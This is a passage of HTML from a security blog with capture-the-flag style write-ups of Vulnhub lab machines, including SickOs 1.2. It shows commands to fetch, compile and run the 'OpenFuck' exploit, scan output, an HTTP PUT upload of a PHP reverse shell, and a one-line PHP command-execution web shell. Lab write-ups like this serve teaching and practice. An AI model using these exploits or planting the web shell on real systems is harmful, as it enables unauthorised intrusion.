<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUBBYqq95ZT_lsLf9Bs0Le4xqP3MiEj5bGBOuxkzugC7XqF1RWGnImz8i30m3_m8_f1BtixcfA2Ulo84iVOPNMmDuL8qvOaJVBiQNoJvVIj6vYqEsWvhFJkLQw8-V7SVgTPnIAuaotF_U/s1600/Screenshot+from+2017-01-23+13-11-10.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUBBYqq95ZT_lsLf9Bs0Le4xqP3MiEj5bGBOuxkzugC7XqF1RWGnImz8i30m3_m8_f1BtixcfA2Ulo84iVOPNMmDuL8qvOaJVBiQNoJvVIj6vYqEsWvhFJkLQw8-V7SVgTPnIAuaotF_U/s320/Screenshot+from+2017-01-23+13-11-10.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
</div>
Port 80 & 443 give an apache test page. I'll try dirb to see if anything is hidden.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXkqxbiWKH63Uo7B0QCkBfrNqYvOni9MeAFxMfpd_LHcr2x5qPKQ_keClqujNmawFk-COHoDQyJEUxEvzMg4YoStsgAmrJlN33e2SRCfz__vXbt9FENJwGVzU6GYFxyMkSCmpP1YNHiCc/s1600/Screenshot+from+2017-01-23+13-14-36.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXkqxbiWKH63Uo7B0QCkBfrNqYvOni9MeAFxMfpd_LHcr2x5qPKQ_keClqujNmawFk-COHoDQyJEUxEvzMg4YoStsgAmrJlN33e2SRCfz__vXbt9FENJwGVzU6GYFxyMkSCmpP1YNHiCc/s320/Screenshot+from+2017-01-23+13-14-36.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Nope, there's nothing there. I'll see if it's vulnerable in someway by using Nikto.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyq4LN60FnpHxro7J0hDe36ZHmlhmwkqRyTnxNymcWbK-77t91u9_mb26vGwhhMlZcVvtAi15WdjFH1uiFyXXzC4gelY7YsRQyeoRa1GuApyJ_584nbsGtclDrQZn4CmePascO6I3WwMc/s1600/Screenshot+from+2017-01-24+13-13-49.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyq4LN60FnpHxro7J0hDe36ZHmlhmwkqRyTnxNymcWbK-77t91u9_mb26vGwhhMlZcVvtAi15WdjFH1uiFyXXzC4gelY7YsRQyeoRa1GuApyJ_584nbsGtclDrQZn4CmePascO6I3WwMc/s320/Screenshot+from+2017-01-24+13-13-49.png" width="320" /></a></div>
<span id="goog_1486880647"></span><span id="goog_1486880648"></span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
It's time to start reading.<br />
<br />
After sifting through the various vulnerabilities that Nikto had found, I came across this exploit:<br />
<br />
<a href="https://www.exploit-db.com/exploits/764/">Open Fuck</a><br />
<br />
What a charming name!!!<br />
<br />
This exploit gave me an absolute headache. As I am using Kali 2 rolling, the version of SSL is higher than that of the exploit. So after a lot of digging and faffing, I managed to get it working. Here's how I did it:<br />
<br />
<br />
<br />
<pre class="brush: bash">apt-get install libssl1.0-dev
</pre>
<br />
This installs the older version of the SSL library. Once this was installed I could compile the exploit.<br />
<br />
<pre class="brush: bash">wget https://www.exploit-db.com/download/764</pre>
<br />
Once the exploit had downloaded, there was still work to do, I followed the guide here <a href="http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/">Exploit Update</a> to update the file.<br />
<br />
I then compiled the exploit:<br />
<br />
<pre class="brush: bash">gcc -o pwn 764 -lcrypto</pre>
<br />
This gave me my executable exploit to run. This exploit needed parameters in order to run correctly namely:<br />
<br />
<br />
I needed to run </div>
<br />
<br />
./pwn <the os type> <ip> -c <open connections><br />
<br />
I ran:<br />
<br />
./ pwn 0x6b 192.168.1.70 -c 40<br />
<br />
And.......<br />
<the of="" os="" type=""><ip><open connections=""> <br />
</open></ip></the><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9R6lLpwd_952xnf7Sq5Zd6xBA_ku_3JxMausNEcLZ8gYQ6VHVo6HrVYFomGtBU_KwYivxeTcaG1fWnZTaYhIV2r866PFXsJM00PUzkyy2PY1IUNXSV1NtIEC_-8QmvWMzPTX1lDHoP3g/s1600/Screenshot+from+2017-02-07+09-35-07.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9R6lLpwd_952xnf7Sq5Zd6xBA_ku_3JxMausNEcLZ8gYQ6VHVo6HrVYFomGtBU_KwYivxeTcaG1fWnZTaYhIV2r866PFXsJM00PUzkyy2PY1IUNXSV1NtIEC_-8QmvWMzPTX1lDHoP3g/s400/Screenshot+from+2017-02-07+09-35-07.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I am....<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://cdn.meme.am/cache/instances/folder717/250x250/58354717.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://cdn.meme.am/cache/instances/folder717/250x250/58354717.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Awesome!!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
There is another way to get (G)root via SMB so sit tight for round 2!!</div>
<br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-29508192009719667872016-10-09T18:07:00.000+01:002017-02-08T14:19:38.014+00:00Vulnhub SickOs 1.2<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
I appear to have a Vulnhub addiction ATM! I put this down to having a free weekend so I can hone my skills :)<br />
<br />
This VM was tricky towards the end as normal scripts etc didn't work. I certainly had to get outside the box for this one!! It is a great VM and you should definitely give it a go.<br />
<br />
So big thanks to <a href="https://twitter.com/vulnub">Vulnhub</a> and <a href="https://twitter.com/D4rk36">D4rk36</a> for this :)<br />
<br />
<br />
<b><u>scan</u></b><br />
<b><u><br /></u></b></div>
</div>
<span style="font-family: Courier New, Courier, monospace;">root@kali:~# nmap -Pn -sV -p 0-65535 192.168.1.7</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-08 16:11 BST</span><br />
<span style="font-family: Courier New, Courier, monospace;">Nmap scan report for 192.168.1.7</span><br />
<span style="font-family: Courier New, Courier, monospace;">Host is up (0.00030s latency).</span><br />
<span style="font-family: Courier New, Courier, monospace;">Not shown: 65534 filtered ports</span><br />
<span style="font-family: Courier New, Courier, monospace;">PORT STATE SERVICE VERSION</span><br />
<span style="font-family: Courier New, Courier, monospace;">22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)</span><br />
<span style="font-family: Courier New, Courier, monospace;">80/tcp open http lighttpd 1.4.28</span><br />
<span style="font-family: Courier New, Courier, monospace;">MAC Address: 00:0C:29:EB:E6:56 (VMware)</span><br />
<span style="font-family: Courier New, Courier, monospace;">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br />
<span style="font-family: Courier New, Courier, monospace;">Nmap done: 1 IP address (1 host up) scanned in 124.06 seconds</span><br />
<br />
<b><u><br /></u></b>
<b><u>ssh</u></b><br />
<b><u><br /></u></b>
<br />
<div class="page">
I'll see what ssh yields:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@kali:~/Downloads# ssh 192.168.1.7</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> .oooooo..o o8o oooo .oooooo. .o .oooo. </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">d8P' `Y8 `"' `888 d8P' `Y8b o888 .dP""Y88b </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Y88bo. oooo .ooooo. 888 oooo 888 888 .oooo.o 888 ]8P'</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> `"Y8888o. `888 d88' `"Y8 888 .8P' 888 888 d88( "8 888 .d8P' </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> `"Y88b 888 888 888888. 888 888 `"Y88b. 888 .dP' </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">oo .d8P 888 888 .o8 888 `88b. `88b d88' o. )88b 888 .o. .oP .o</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">8""88888P' o888o `Y8bod8P' o888o o888o `Y8bood8P' 8""888P' o888o Y8P 8888888888</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">By @D4rk36</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">root@192.168.1.7's password: </span><br />
<br />
Not alot apart from nice ASCII art :D<br />
<br />
I'll try port 80 then!<br />
<b style="font-family: "Open Sans", sans-serif;"><u><br /></u></b>
<b style="font-family: "Open Sans", sans-serif;"><u>http</u></b><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Navigating to the ip gives the following page.</span><br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span>
<br />
</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT0SG83rc6UNMR5z3rJX7LhHEusmIdtCF9___b2ihf_mzoT9pJS1z6igecR9ytGywBTb-_M15jAhy-8G90a0dHV6jLw5Z7TBC1qjb-8EpLiLsL81Wh8Pfln7p7AmmX_bydl1JLVEoCbC4/s1600/1-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT0SG83rc6UNMR5z3rJX7LhHEusmIdtCF9___b2ihf_mzoT9pJS1z6igecR9ytGywBTb-_M15jAhy-8G90a0dHV6jLw5Z7TBC1qjb-8EpLiLsL81Wh8Pfln7p7AmmX_bydl1JLVEoCbC4/s320/1-1.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span>
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span>
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span>
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span>
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">The source code contains no hints, so I'll see if there is anything hidden:</span><br />
<div style="text-align: left;">
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="font-size: x-small;">root@kali:~/Downloads# dirb http://192.168.1.7 -w<br />•<br />• -----------------<br />• DIRB v2.22<br />• By The Dark Raver<br />• -----------------<br />•<br />• START_TIME: Sat Oct 8 16:22:08 2016<br />• URL_BASE: http://192.168.1.7/<br />• WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt<br />• OPTION: Not Stoping on warning messages<br />•<br />• -----------------<br />•<br />• GENERATED WORDS: 4612<br />•<br />• ---- Scanning URL: http://192.168.1.7/ ----<br />• + http://192.168.1.7/index.php (CODE:200|SIZE:163)<br />• ==> DIRECTORY: http://192.168.1.7/test/<br />•<br />• ---- Entering directory: http://192.168.1.7/test/ ----<br />• (!) WARNING: Directory IS LISTABLE. No need to scan it.<br />• (Use mode '-w' if you want to scan it anyway)</span><br /><span style="font-size: 13px;">• </span></span><span style="font-family: "open sans" , sans-serif; font-size: 13px;"> </span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">L</span><span style="font-family: "open sans" , sans-serif; font-size: 13px;">et's see what /test yields:</span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMp7Wxn4yVjgb-7nv1c7JOsHAkkXy_Toh-g2tplaZ-EhijeLna6G5-ceojRekvl78PK6_yQGiE8CmIRWXwHetyr2QxwrGjN-Kae5mDxrjd2Y-SFySznzDC_xMOes7PhAKCXHLSMhGCTec/s1600/1-2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMp7Wxn4yVjgb-7nv1c7JOsHAkkXy_Toh-g2tplaZ-EhijeLna6G5-ceojRekvl78PK6_yQGiE8CmIRWXwHetyr2QxwrGjN-Kae5mDxrjd2Y-SFySznzDC_xMOes7PhAKCXHLSMhGCTec/s400/1-2.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span>
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span>
<br />
<span style="font-family: "open sans", sans-serif; font-size: 13px;"><br /></span>
<div style="text-align: left;">
<span style="font-family: "open sans", sans-serif; font-size: 13px;">Hmmm....</span></div>
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">I try and see i</span><span style="font-family: "open sans", sans-serif; font-size: 13px;">f there is anything in the way of known weaknesses in lighttpd/1.4.28 but I come away empty handed.</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">There must be a way to upload to this page....... Hang on!!! What methods are available on this web page can I PUT??</span><br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1LmbRzsxXaeNzpM8quGXrp-GxxwRwXN2nRBv3iqxHRW1t-QexTYr9_j7R1Nsc0pfIMXfQ6lsxRk_ZEEaMI3jS-SFvWs4hE9GLBISazjHG3xBByZqDvyXYjP_rviFoDFGQhqG6cq_npWQ/s1600/1-3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1LmbRzsxXaeNzpM8quGXrp-GxxwRwXN2nRBv3iqxHRW1t-QexTYr9_j7R1Nsc0pfIMXfQ6lsxRk_ZEEaMI3jS-SFvWs4hE9GLBISazjHG3xBByZqDvyXYjP_rviFoDFGQhqG6cq_npWQ/s400/1-3.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span>
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Phew!! I can PUT here. Now to find out how I can achieve this!! Ideally I want a reverse shell so pentestmonkey's one should do!! (</span><a href="http://pentestmonkey.net/tools/web-shells/php-reverse-shell" style="font-family: "Open Sans", sans-serif; font-size: 13px;">http://pentestmonkey.net/tools/web-shells/php-reverse-shell</a><span style="font-family: "open sans" , sans-serif; font-size: 13px;">)</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">I upload it using nmap's scripting engine:</span><br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhujHH9YI2InoKqnwghRtp_BrBDWZZrhjmNoRK55M64rQ7zFOpap_HpHJqgGauQ7MPa83XFpvLrtkXFtDQ3KEhVSbAheBrsbq8UV5tHKLFmKj-PgHNQRW_JwSPPedZj6nSh6F4TmE1YFb8/s1600/1-4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhujHH9YI2InoKqnwghRtp_BrBDWZZrhjmNoRK55M64rQ7zFOpap_HpHJqgGauQ7MPa83XFpvLrtkXFtDQ3KEhVSbAheBrsbq8UV5tHKLFmKj-PgHNQRW_JwSPPedZj6nSh6F4TmE1YFb8/s400/1-4.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Check to see if it's there:</span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span>
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeh25cNMhXEarz35XzT8aUtZJr_lhaYbbpC3RO4oHsYfaUOwILssTpGmuBpsUJ_r-rNTMJt9EIe5KgmKYDmU-TYZ_StrwSQ1y0yF47RtRIUjhXsK836wDkXLmlDDIF5gf7Yd5eTMm62nw/s1600/1-5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeh25cNMhXEarz35XzT8aUtZJr_lhaYbbpC3RO4oHsYfaUOwILssTpGmuBpsUJ_r-rNTMJt9EIe5KgmKYDmU-TYZ_StrwSQ1y0yF47RtRIUjhXsK836wDkXLmlDDIF5gf7Yd5eTMm62nw/s400/1-5.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Awesome! I set my netcat listener on port 443 then click the file.</span><br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE77HiF6AB39YUrsDfKXKt42ZAbWvPjsmq4RUmkUySn6j_z3ymmoMGSFT77Lc_He3k3jTyCxka5Ov8Vn_9fQ33QySbAfj9gOm2zBTgNfiq0XRuKjgvH8dqcAQzKU810icEIZm-xygnyIM/s1600/1-6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE77HiF6AB39YUrsDfKXKt42ZAbWvPjsmq4RUmkUySn6j_z3ymmoMGSFT77Lc_He3k3jTyCxka5Ov8Vn_9fQ33QySbAfj9gOm2zBTgNfiq0XRuKjgvH8dqcAQzKU810icEIZm-xygnyIM/s400/1-6.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Agh!!!</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">That failed miserably :(</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Ok, I wonder if I can get a dirty shell on it? I use the one liner:</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><?php echo shell_exec($_GET['cmd']); ?></span></span><br />
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div style="text-align: left;">
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW_YRpTJrTbRCSIOVtuFLXF7ulbNi8a4413OP-zVCwZPhqwwjz92_4Sk6nhFZXJd19hU2Fk3i8FMvd2ybeK3zZLj9FvsQv5CD-TuSry1DC5MpPCfS8QRljXPjNSzUUk6JrJCh3dx6tmt4/s1600/1-7.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW_YRpTJrTbRCSIOVtuFLXF7ulbNi8a4413OP-zVCwZPhqwwjz92_4Sk6nhFZXJd19hU2Fk3i8FMvd2ybeK3zZLj9FvsQv5CD-TuSry1DC5MpPCfS8QRljXPjNSzUUk6JrJCh3dx6tmt4/s400/1-7.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div style="text-align: left;">
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div style="text-align: left;">
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div style="text-align: left;">
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div style="text-align: left;">
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div style="text-align: left;">
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div style="text-align: left;">
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div style="text-align: left;">
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div style="text-align: left;">
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div style="text-align: left;">
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div style="text-align: left;">
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;"><br /></span></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Run the command via the browser:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
